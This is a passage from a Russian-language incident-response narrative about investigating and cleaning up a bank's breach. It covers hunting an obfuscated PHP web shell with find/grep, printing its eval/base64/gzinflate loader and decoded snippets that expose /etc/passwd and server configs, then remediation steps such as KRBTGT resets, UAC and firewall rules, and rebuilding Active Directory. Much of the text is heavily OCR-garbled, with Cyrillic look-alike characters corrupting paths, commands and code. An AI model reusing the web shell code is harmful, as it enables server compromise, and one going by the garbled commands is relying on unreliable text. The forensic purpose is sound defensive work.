/ѵап/мми/1еосаТа1ое/мр-іпс1исІе5/ІХК/с1а55-ІХК-те55аее.рІір 
/ѵаг/ммм/1еосаТа1о§/мр-іпс1исІе5/ІХК/с1а55-ІХК-Ьа5е64.рЬр 
/ѵаг/ммм/1еосаТа1ое/мр-іпс1исІе5/ІХК/с1а55-ІХК-гедие5Т.рЬр 
/ѵаг/мѵлу/1еосаТа1о§/мр-іпс1исІе5/мр-сІЬ. рНр 
/ѵаг/ммм/1еоса1:а1ое/мр-іпс1исІе5/с1а55-ма1кег-раее. рЬр 
/ѵаг/м\лплі/1еосаТа1ое/мр-іпс1исІе5/с1а55-мр-таІ:сЬе5таргееех.рИр 
/ѵаг/ммм/1еосаТа1о§/мр-іпс1исІе5/ соттепТ . рНр 
/ѵаг/ммм/1еосаТа1о§/мр-іпс1исІе5/с1а55-мр-1І5І:-и1:і1. рЬр 
/ѵап/ммм/ІеосаТаІое/мр-іпсІисІеБ/Ііпк-ТетрІаТе.рИр 
/ѵаг/ммм/1еосаТа1о§/мр-іпс1исІе5/асІтіп-Ьаг.рЬр 

/ѵаг/ммм/1еоса1:а1оё/мр-іпс1исІе5/місІ§е1:5/с1а55-мр-паѵ-тепи-мі(і§е1; .рЬр 

/ѵаг/ммм/1еосаТа1о§/мр-іпс1исІе5/міс1§е1:5/с1а55-мр-міс1§е1-1:а§-с1оисІ - рЬр 

/ѵаг/ммм/1еосаТа1о§/мр-іпс1исІе5/с1а55-мр-ІіТТр-гедие5Т5-ге5роп5е. рЬр 
/ѵаг/ммм/ІеосаТаІое/ілір-іпсІисІеБ/ТНете. рЬр 
[■■■] 


90 Ніф5://Ыоа.5исип.пеі/2017/02/сопіепІіпіесііоп-ѵиІпегаЬІІІТ/-ѵѵогсірге55-ге5і-арі.ІіітІ 








Помните, что мы ведем речь о веб-приложении, которое было 
свернуто несколько месяцев назад. Не должно быть практически 
никаких существенных обновлений кода за последнее время, и 
все-таки мы получаем достаточное количество изменений 
рИр-файлов, что весьма странно. 

В любом случае, поскольку мы знаем, что атакующий - фанат 
Ьазе64 91 , давайте раскинем большую сеть, которая будет ловить 
все подозрительно длинные строки. Для этого мы используем 
опцию “-ехес” для команды -РіпсІ. 

Это позволит нам выполнять ЬазИ-команду для каждого 
отдельного результата, возвращаемого -РіпсІ. Выбираем поиск 
Ьазе64-строк, используя команду §гер 92 : 


:~/ ТіпсІ . -Туре Т -тТіте -360 -пате п *.рЬр" -ехес §гер -Еі п [а- 
г0-9/=]{50,}" {} /сіеѵ/пиіі \; 


/ѵіо гф гезз/мр -асІтіп/іпсТисІез/ирсІа'Ііе -со ге. рЬр: 1 мр -іпсіисіез/і з/Тіпутсе/зкіпзЛго гф гезз/ітадез/ 

/Ѵ'/огфгезз/щр-асІтіп/зеТир-сопІ'ід.рф: _ $сЬагз = ' аЬс сіе ТдНі 1 кІтпордг зТиѵщхѵгАВСРЕРСНІ 

Л»югфге55/ыр-соп1:егуІ:/ирТ.оасІ5/ріс 981 .рф:еѵаКд2ІпГ1.а1:е(Ьа59б4 с!есосіе( ' ЮЗ НкдМ0ЕкЦ/22дСВсі4і: 
фАитіѵѵ/ЕЗРрВѴЛ5АхТгдВ46]ВѴі//ѲѲХрддѴ\/ѲѲуОІ/Н1кО71ІдхІ/Зді024ѵ27НІ-5™Ѵ\л/1Ве0КіѴН2ѴТгХ1:оіаКУсікТ4о/ 
= Ѵ\/1ѵѴМ9у50МсІ44з5гРе5С8.]Ру0уЕрК+ІІѲу8с(4п2Е2І9М0сІпТМкІ_КС)()82ІУРМЗзР4'ШРР9д08Аі Т5се1:а4НМ7Нк2і752у 
7Ѵ5ЕІ_УЗІ\ІВ(}ѴпіхНк58сІА()5НТос5ро9кѵЛдѵі//І"іМ7] 5] М700хдрусЬхГСзМгуШШк/2М9НѲЗ.]С6Уи0оодАЬ74а+ЗоА5П5М\» 
7оиг2о/ЕВаЗА2утНсгѵ51 : Аск4ѵ«І2+Зі0Ѵ-шКІѲХѲаР53сІкіЕ6У6кХ6оРдХ2д2Ь2уиХЕЬЬѴі/2дСЬ01І5ѲРММУ2зМІІЗІіМі:81 


Результат весьма трудный для понимания и нагруженный, но 
если мы проскроллим неспеша, то ясно увидим большую порцию 
сплошных данных, занимающих третий результат. Бинго! Это 
классический метод обфускации веб-шелла. Функция 
Ьазеб4_сІесосІе используется для декодирования данных, которые 
затем распаковываются при помощи §2ІгтР1а1;е. 


91 Исходя из всех пейлоадов на РоѵѵегЗИеІІ, которые мы ранее раскрыли. 


92 Мы заставляем дгер отображать файл, скармливая ему второй (фальшивый) файл /беѵ/пиІІ. 





Результат отправляется в функцию еѵаі, которая выполняет 
его как стандартный рИр-код. Нам не нужно декодировать этот 
пейлоад вручную, поскольку есть онлайн-инструменты 93 для 
автоматизации этого процесса: 


еізе { 

есРю "<Ьгха 

Нге-Р=\"" .$5иг1."ас1:=І5а&піхра55мсІ=1&сІ=" .$исІ."\"><Ь><и>ее1: 
/еТс/ра55мсІ</и></Ь></а><Ьг>"; 

} 

і-р (■Рі1е_§е'1;_согѵІ;еп1:5( ,, /еТс/и5егсІотаіп5") ) { 
есРю "сЬх-РогтР со1ог=\"§гееп\"ха 

Иге-Р=\"" .$5иг1."асТ=-Р&-Р=и5епсІотаіп5&сІ=/е1:с/&-Рі:=1:х1:\"хихЬ>Ѵіем 
срапеі изег-сіотаіпз 1о§5</Ьх/их/ах/-Роп1:х/ЬхЬг>"; 

} 

і-р (-Рі1е_§е1:_соп1:еп1:5("/и5г/1оса1/арасІіе/соітР/И1:1:рсІ.соітР")) { 
есРіо 'ЧЬх-РопТ со1ог=\"§гееп\"ха 

Нге-Р=\"".$зиг1. "асТ=-Р&-Р=ІтІ;ТрсІ. сопТ&сІ=/и5г/1оса1/арасНе/соп*/&^=ТхТ\ 
"хи> 

<Ь>АрасИе соітРіеипаТіоп (ІтЫрсІ. согѵР)</Ьх/их/ах/-Роп1:х/ЬхЬп>"; 

} ••• 


Похоже на графический веб-шелл с ЗОІ_-инструментами, 
возможностями для загрузки файлов и т.д. Настоящий набор 
инструментов для проведения глубоких ріѵоііпд-операций. 
Веб-шелл подобного рода можно скачать на каждом шагу в 
интернете. 94 

Они менее продуманные, чем те бэкдоры, что мы обнаружили 
на устройствах под ѴѴіпбоѵѵз, поэтому может быть, нет никакой 
взаимосвязи между двумя атаками. Однако даты согласуются с 
хронологией, выстроенной к настоящему моменту: 
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Мы могли бы продолжить веселье с различными пейлоадами, 
оставленными атакующим, но теперь становится ясно, что мы 
имеем дело с веб-уязвимостью, которая каким-то образом привела 
к несанкционированному доступу к І_іпих. 

С этой машины атакующий проник на сервер ѴѴіпбоѵѵз, 
используя один из множества доступных методов: ЗМВѵІ эксплойт 
М3017-100, брутфорс пароля локального администратора, нашел 
скрипт в открытом общем ресурсе ЗМВ? Кто знает, и мне кажется, 
никто с этим уже не разберется. 

Есть лимит по количеству информации, которую мы можем 
получить из логов контроля и корреляции данных на диске/в 
памяти... Наступил момент, когда мы достигли своего предела в 
этом расследовании. Теперь переходим к насущной части. Что 
делать после диагностики атаки? 


Убей или исцели 


"Исцеление изнутри - это ключ" 

Вайнонна Джадд 


Мы готовим совещание с руководящим составом, чтобы 
представить текущее состояние расследования. Данная схема 
детализирует основные этапы атаки. 



2 января 2017 


Суммарное количество затронутых активов: 15 серверов, 3 
рабочих станции и 1 мэйнфрейм. 

Тип утекших данных: документы НН, бизнес-стратегии, пароли 
мэйнфрейма и скорее всего, электронные письма и пароли 
ѴѴіпсІоѵѵз. 

Генеральный директор терпеливо выслушивает анализ 
отчета, затем задаем нам вопрос, который вертится на языке у 
всего руководящего состава корпорации в течение нескольких 
минут: “Как нам вернуться обратно в нормальное русло?” 

Прямой ответ на этот вопрос неприятен: “Никак”. 

Зачем спешить к возвращению обратно к слабому дизайну 
архитектуры, который позволил атаке столь просто 
распространиться в самое сердце информационной системы? Вот 
что следовало спросить директору и руководству: “Что нам делать 
дальше?” Ответ на этот вопрос более дружелюбный: “Время 
кикнуть атакующего из сети”. 















Нам нужно вырезать все подозреваемые ресурсы, 
использованные атакующим для поддержания своего присутствия в 
системе... начиная с отключения интернета! 

По началу это может показаться ужасающим, но компании 
могут выжить без доступа к интернету в течение нескольких дней, 
даже недель. Мы регулярно встречаем подобное в крупных 
кризисных ситуациях. Разумеется, мы не останавливаем все 
коммуникации с внешним миром. Это было бы слишком брутально 
для банка, которому нужно обслуживать тысячи клиентов. 

Мы заблокируем весь интернет-трафик, который не является 
явно критичным для ключевых бизнес-процессов І_ео5ігаі. Вот 
почему мы сразу же поставили задачу для кризисной команды в 
первые несколько часов по составлению списка всех важных 
внешних деловых партнеров: филиалов, правительственных 
организаций, удаленных групп управления, поставщиков и проч. Как 
я сказал ранее: надейся на лучшее, готовься к худшему. 

Пока администраторы файрвола отключают весь трафик, за 
исключением трафика в направлении определенных внешних 
ІР-диапазонов, мы обращаемся к администраторам прокси и 
однозначно просим их занести в черные списки все ІР-адреса С2С, 
которые мы пометили ранее. Таким образом, тревога будет 
подниматься каждый раз, когда машина попытается связаться с 
одним из этих запрещенных ресурсов. 

Эти два действия гарантируют, что атакующий больше не 
будет находиться внутри систем І_ео51гаі, начиная с настоящего 
времени. Теперь давайте позаботимся о его многочисленных 
бэкдорах. 


Мэйнфрейм 


Во-первых, начнем с мэйнфрейма. Мы уже определили 
действия для выполнения на этой машине, поэтому надо лишь дать 
зеленый свет команде системных администраторов: 

• Аннулировать учетные записи 619861 и 609111. 

• Удалить программу 5ѴС 241; выяснить, какое ПО внесло ее, 
чтобы предупредить поставщика и исправить это. 

• Принудительно сбросить пароли всех пользователей 
мэйнфрейма (не технических учетных записей). 

• Остановить и удалить исполняемый модуль бэкдора іЬт_согр. 

• Добавить атрибут РКОТЕСТЕЭ для каждой технической учетной 
записи, а позже принудительно сбросить пароли. 

Мы концентрируем наши усилия на краткосрочных действиях, 
которые незамедлительно остановят утечку. 

Есть очень много проблем, которые нужно решить в 
мэйнфрейме для последующего улучшения его безопасности: 
тщательный контроль доступа, улучшение политики паролей, более 
сильные алгоритмы хэширования и так далее. Но все это придется 
сделать в течение последующих нескольких месяцев в качестве 
части глобального проекта по усилению защиты. 

ѴѴіпсІоѵѵз-машины 

Теперь мы обращаем наше внимание на окружение ѴѴіпсІоѵѵз. 
Суммарно у нас 15 зараженных серверов и 3 рабочие станции. В 
идеале, нам следует удалить все файлы на дисках и запуститься на 
полностью свежих системах ѴѴіпсІоѵѵз с усиленной защитой. 

Это, конечно, означает потерю всех рабочих данных, 
хранящихся на машинах. 


Для некоторых серверов, которые хостят только 
веб-приложения, это не проблема. І_ео81гаі нужно лишь найти 
соответствующие приложения и переустановить их на серверах, что 
практически никак не навредит. Однако, на двух серверах - 5Ѵ0088 и 
5Ѵ0771 - хранятся очень важные данные, которые никуда не 
реплицируются... І_еоЗігаі не могут их потерять. 

Нет смысла пытаться исправить эти зараженные машины, по 
крайней мере, не в случае, когда вы сталкиваетесь с целевой 
атакой. 

Ни один здравомыслящий следователь не будет утверждать о 
своих способностях по обнаружению и удалению с хирургической 
точностью всех зараженных частей системы. Это в любом случае 
не наша главная цель. Мы лишь пытаемся собрать воедино 
достаточное количество улик, чтобы разобраться в атаке и 
отследить ее источник. 

Мы определенно не можем вычислить все мельчайшие 
изменения в системах, чтобы исправить их. На это ушли бы годы 
времени... для каждой из машин, и мы всегда бы задавались 
вопросом, не упущено ли что-либо. 

Мы разберемся со специфической проблемой 5Ѵ0088 и 5Ѵ0771 
позже. Во-первых, мы начинаем с отключения всех подозреваемых 
машин и рабочих станций от интернета. Далее мы готовим 
свежеустановленные новые системы ѴѴіпбоѵѵз, с надлежащим 
образом усиленной защитой, согласно руководствам по 
безопасности СІЗ. 95 

Мы просим команды І_еоЗігаі заново установить необходимые 
приложения на эти обновленные машины и сконфигурировать 
правильные ІР-адреса, ЭИЗ-имена и так далее, чтобы сделать их 
доступными сразу же после настройки. 
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Эти действия займут несколько часов или дней для 
некритичных машин. Рабочим группам и партнерам необходимо 
найти альтернативные способы выполнения своей работы, но 
руководство примет решение по надлежащему способу 
коммуникаций. 

Для двух критичных серверов, 5Ѵ0088 и 5Ѵ0771, будут приняты 
дополнительные меры. 

Нам нужно скопировать важные данные - базы данных ЗОІ_ и 
файлы в критичных папках - на свежеустановленные новые 
машины, не заразив их чем-либо, что оставил после себя 
атакующий: РоѵѵегЗИеІІ-скрипты, вредоносные исполняемые файлы, 
заминированные документы ѴѴогсІ и прочего. 

Для начала мы подключаем внешний жесткий диск ко двум 
зараженным машинам и делаем массовое копирование всех 
критичных директорий. Во время копирования мы исключаем 
большую часть расширений исполняемых файлов: 
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Если вы внимательно просмотрите список расширений, то 
заметите, что мы оставили некоторые очень “опасные” расширения: 
босх, хізх, рсК и т.д. Что если атакующий заминировал документ и в 
следующий раз, когда когда-либо откроет его, РоѵѵегЗИеІІ-пейлоад 
свяжется с атакующим, тем самым преподнеся ему восхитительный 
подарок? 

Поскольку нет надежного способа удалить встроенные в 
документы СЖісе макросы и баѵаЗсгірі без изменения структуры 



файла, простым выходом из ситуации будет попросту удалить все 
файлы этих форматов целиком. Но мы не можем так поступить. 

90% важных данных хранятся в одном из этих форматов, так 
что с таким успехом можно вообще не перемещать никакие 
данные... 

Нет прямого ответа на эту дилемму. Пойти на риск или не 
брать в расчет критичность имеющихся данных - решение клиента. 
Например, в данном случае, І_ео5ігаі решают скопировать все 
документы (Жісе в любом случае. 

Если файл с бэкдором проскользнет внутрь, обращение к С2С 
все равно будет заблокировано на уровне файрвола и прокси, так 
что это приемлемый риск. Кроме того, в прокси и файрволе будут 
определены правила надзора, которые будут поднимать тревогу в 
случае, если эти сервера начнут связываться с любыми внешними 
ІР-адресами. 

Как только мы завершаем копирование файлов, то 
подключаем внешний диск к промежуточной машине, где мы 
настроили общую сетевую папку, из которой мы безопасно 
выгружаем данные на новые машины. 

Подобный сетап позволяет избежать заражений малвари 
через ІІЗВ-носители и обеспечивает безопасный мост между 
скомпрометированными и новыми машинами. Конечно, мы можем 
запустить антивирусное сканирование на промежуточной машине 
для дальнейшей проверки данных. 


АсЫѵе РігесЬогу 


По окончании копирования данных, мы обращаемся к самой 
крупной проблеме: ѴѴіпсІоѵѵз Асііѵе Оігесіогу! Начинаем со сброса 
паролей всех пользователей в домене. 

Как и в случае с мэйнфреймом, многие технические учетные 
записи нельзя просто сбросить до того, как мы найдем все скрипты 
и приложения, работающие с ними, поэтому мы только удаляем их 
права на интерактивные сеансы, пока что. Даже если атакующий 
знает их пароли, он не сможет использовать их для подключения к 
машинам. 
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Оснастка Асііѵе Оігесіогу ІІзегз апсі Сотриіегз 
в контроллере домена 

При сбросе паролей нам нужно не забыть о дефолтных 
учетных записях, используемых ѴѴіпсІоѵѵз, типа учетных записей 
ККВТСТ и 05КМ. 96 Пароль ККВТСТ используется для шифрования 
Билета на получение билетов (ТОТ) в протоколе аутентификации 
КегЬегоз. 97 
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Если атакующий контролирует эту учетную запись, он может 
создавать фальшивые билеты КегЬегоз, которые предоставят ему 
доступ высокого уровня 98 , даже несмотря на то, что все остальные 
пароли были изменены. 99 

Р5КМ - это локальная резервная учетная запись, которая 
создается во время настройки контроллера домена. Это очень 
могущественные учетные записи, которые должны сбрасываться в 
первую очередь. Вдобавок, пароль ККВТСТ необходимо изменить 
дважды, потому что оба пароля - и старый, и новый - считаются 
валидными (мера безопасности, реализованная МісгозоТС). 

Вне всякого сомнения, это серьезные изменения, которые 
определенно нарушат работу некоторых приложений в окружении 
І_еоЗігаі. Поэтому мы выполняем их в ночное время, когда админы 
смогут найти и устранить проблемы, сведя к минимуму воздействие 
на время работы бизнеса. 

По готовности изменений доменных учетных записей, мы 
переходим к другим, менее управляемым типам аккаунтов: 
локальным. Начнем с локальных администраторов. Перед 
настройкой решения от МісгозоТС - І_АР8, которое позволяет 
периодически изменять локальные пароли каждые 20 минут, нам 
нужно временное решение для ограничения ріѵоііпд-возможностей. 
Для этого мы используем небольшой трюк, а именно - удаленный 
II АС. 


ІІАС - это средство, представленное на ѴѴіпсІоѵѵз Ѵізіа, которое 
открывает пользователям всплывающее диалоговое окно перед 
выполнением привилегированных действий (установка ПО и проч.). 

Таким образом, даже администратор не может удаленно 
выполнять привилегированные команды в системе. Дефолтная 
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99 Практическая демонстрация была проведена в книге “Занимайся хакингом с ловкостью Бога”. 




учетная запись администратора по умолчанию освобождена от 
ІІАС. Мы можем изменить это в объекте групповой политики в ОС 100 
(меню 5есигі1:у Бе1:1:іп§5\І_оса1 Ро1ісіе5\5есигі1:у 0р1:іоп5 в 
параметрах политики): 
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> 1 3 Зо^ѵѵаге КеБігісйоп РоІісіеБ 

> I Арріісаііоп Сопігоі РоІісіеБ 

> ІР Бесигйу РоІісіеБ оп ЬосаІ Сотрите 

> [3 Асіѵапсесі Аисіі* Роіісу Сопбдигабоп 


Роіісу ж Бесиггіу БеШпд 

Ем, Іізег Ассоип* СопігоІ: Опіу еіеѵаіе ехесиіаЫеБ іИаІ аге БІдпесІ апсі ѵаіісіа... РІБаЫесІ 
ІІБег Ассоип* Сс - 


3, ІІБег Ассоипі Сс 
ІІБег Ассоип* Со 
ІІБег Ассоип* Сс 


ІІБег Ассоип* СопйгоІ: Асітіп АрргоѵаІ Мосіе ^ог і, 


І_осаІ Зесигііу ЗеКіпд 


Бсріаіп 


ІІзег Ассоипі Соггігоі: Асітіп АрргоѵаІ МобеЬгіНе ВиіК-іп 
Асітіпізігаіог ассоигЛ 


(§) ЕпаЫесі 
О йізаЫесі 


Кроме того, чтобы ограничить возможности удаленного 
выполнения кода на рабочих станциях, мы размещаем правило 
брандмауэра, которое блокирует порты 445 (ЗМВ), 135 (ГСРС), 5984 
(ѴѴіпРМ), 5986 (ѴѴіпРМ) и 3389 (РЮР). Несколько виртуальных 
рабочих станций, работающих на фермах Сіігіх, освобождаются от 
этого правила, но оно покрывает как минимум 95% всех активов. 

Можно внедрить гораздо больше мер усиления защиты, но 
они скорее всего повлияют на бизнес І_ео5ігаі. К тому же, мер, 
которые мы только что применили, вполне достаточно, чтобы 
остановить утечку и предотвратить крупную катастрофу в случае, 
если атакующий каким-либо образом сможет вернуться обратно в 
ближайшем будущем. 

Следующей ночью, когда большая часть паролей были 
сброшены (по крайней мере, пароли администраторов), мы 
готовимся к последнему крупному этапу: репликации ѴѴіпсІоѵѵз Асііѵе 
Оігесіогу на чистые сервера. 
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Хотя мы не видели какого-либо вредоносного трафика с 
контроллеров домена, мы допускаем, что поскольку атакующий 
получил учетные данные администратора домена, он мог легко 
посадить бэкдор в ОС. 

Мы не можем позволить потерять доверие к этому 
критическому компоненту, поэтому принимаем решение 
восстановить Асііѵе Оігесіогу на наборе чистых серверов. 

АО - это всего лишь файл базы данных, который может быть 
перемещен от одного сервера к другому. Процедура полностью 
автоматизирована Місгозоф но чтобы избежать проблем с 
целостностью, нам нужно полностью отключить доступ к 
контроллеру домена. Мы подбираем подходящее окно времени для 
выполнения этой операции (3-4 утра, к примеру). 

Готовим чистый сервер ѴѴіпсІоѵѵз с усиленной защитой 
согласно актуальным стандартам безопасности, подключаем его к 
сети, затем “повышаем” его до уровня следующего контроллера 
домена. Здесь мы пропустим обычные шаги и уделим внимание 
только одному меню, которое отличается от стандартной установки 
домена. Об обычном процессе вы можете почитать здесь. 101 

Когда нам предлагается выбрать операцию развертывания, 
выбирайте добавление нового контроллера домена к 
существующему домену: 
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Гт 


Асііѵе Оігесіогу Оотаіп 5егѵісе$ СопТідигаІіоп \Л/ігагсІ 


Оеріоутепі: Сопйдигайоп 


ТАКСЕТ 5ЕКѴЕК 
ЕХТ5Ѵ088 


Оеріоутепі Сопйдигайоп 


Беіес* іЬе сіеріоутеп* орегайоп 

(§) Асісі а Оотаіп сопігоііег Іо ап ехізііпд сіотаіп 
О Асісі а пеѵѵ сіотаіп Іо ап ехізііпд {огез* 

О Асісі а пеѵѵ {оге$* 


Зресііу Фе сіотаіп іпГогтаііоп й>г ФІ5 орегайоп 


йотаіп: 


ЬЕОЗТКАТ.СОКР 


Беіесі.. 


Все объекты домена и правила будут перемещены на этот 
новый сервер, который становится дополнительным контроллером 
домена ѴѴіпсІоѵѵз. Мы клонируем его дважды, чтобы иметь 
несколько резервных копий, а затем отключаем старые 
контроллеры домена. Перед тем, как сделать это, мы проверяем, 
что все ЭИЗ-записи на ЭНСР-серверах обновлены и ведут на этот 
новый контроллер домена. 

Как только процедуры миграции и очистки выполнены и 
перепроверены, мы можем восстановить подключение 
информационной системы к интернету и отслеживать любую 
подозрительную активность: связь сервера с известными С2С 
ІЖІ_-адресами, создание новой привилегированной учетной записи, 
трафик в интернет с внутреннего ресурса и т.д. 

Подобный мониторинг требует многочисленных правил 
наблюдения, установленных для всех машин и анализируемых 
централизованно (как вариант, Зріипк, ЕІ_К и др.). 

Это далеко не окончание кризиса, но наша основная работа в 
качестве участника форензик-команды практически завершена. Нам 
нужно лишь написать криминалистический отчет, в котором будут 
описаны собранные артефакты и хронология атаки, но большая 
часть расследования выполнена. 









Однако же, помните, что есть множество проблем, с которыми 
мы не разобрались во время этой охоты за малварью, поскольку мы 
предпочли сосредоточиться на технической части всего этого: 

• Официальный внешний обмен информацией: нужно ли 
І_ео81гаі выпускать заявление для прессы? Если да, то как 
много деталей они должны раскрыть? 

• Официальный внутренний обмен информацией: какие отделы 
и управленцы должны быть оповещены? Как насчет 
остальных сотрудников? Безусловно, история реального 
взлома поможет улучшить общее знание и понимание мер 
безопасности, но это также навредит репутации І_еоЗігаі. 

• Долгосрочные меры усиления защиты: недостаток базовых 
мер обеспечения безопасности помог атакующему оставаться 
незамеченным в течение нескольких месяцев. Критически 
важно внедрять фундаментальные принципы безопасности: 
более тщательная сетевая фильтрация и сегментация, 
гигиена надежных паролей, разделение административного 
леса ѴѴіпсІоѵѵз 102 , правила контроля и так далее. Но 
нецелесообразно делать все это в первые несколько дней 
после обнаружения взлома. Необходимо инициировать 
масштабный проект, чтобы учесть все эти проблемы, что, 
конечно же, займет определенное время. 

• Юридические проблемы: в зависимости от юрисдикции, 
некоторые компании обязаны оповещать правительство по 
обнаружению несанкционированного доступа. Данные 
процедуры должны быть выполнены максимально оперативно. 

Со всеми этими проблемами (и даже больше) необходимо 
справиться во время кризиса безопасности. Так что, можете себе 
представить, какое безумие происходит в офисе компании, 
адреналин мчится по вашим венам, когда вы наконец находите 


102 Прим, переводчика: полезная ссылка 
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зацепку, идете по ней и раскрываете новый фрагмент улик, который 
проливает свет на атаку. 

Это неописуемое чувство, и я надеюсь, что вы смогли ощутить 
нечто похожее в процессе чтения о расследовании, описанном на 
этих страницах. 


Итоги 

Если поразмышлять об этом инциденте, то мы с уверенностью 
можем сказать, что у нас не было схемы сети, было очень мало 
доступных людей, были администраторы, которые не знают свои 
ІР-диапазоны наизусть, но нам чертовски повезло заполучить 
сетевые логи за последние три месяца. Вероятно, это оказалось 
самое лучшее решение по безопасности, которое когда-либо было 
сделано в І_ео8ігаі! 

Когда я читаю отчеты аудиторов, мне всегда кажется 
странным, насколько пентестеры недооценивают важность 
надлежащего централизованного логирования с хорошим временем 
хранения данных (более трех месяцев). 

Нет ничего более фрустрирующего для специалиста по 
инцидентам, чем ответить терпящему бедствие клиенту: “Извините. 
Нет логов, нет расследования... просто переустановите все свои 
машины”. Форензика жестких дисков прекрасна, форензика памяти - 
веселит. 

Но несомненно, что именно надлежащее логирование событий 
(на сетевом и системном уровнях) дает нам полную картину об 
инциденте. А без него... что ж, нет реагирования на инциденты. 
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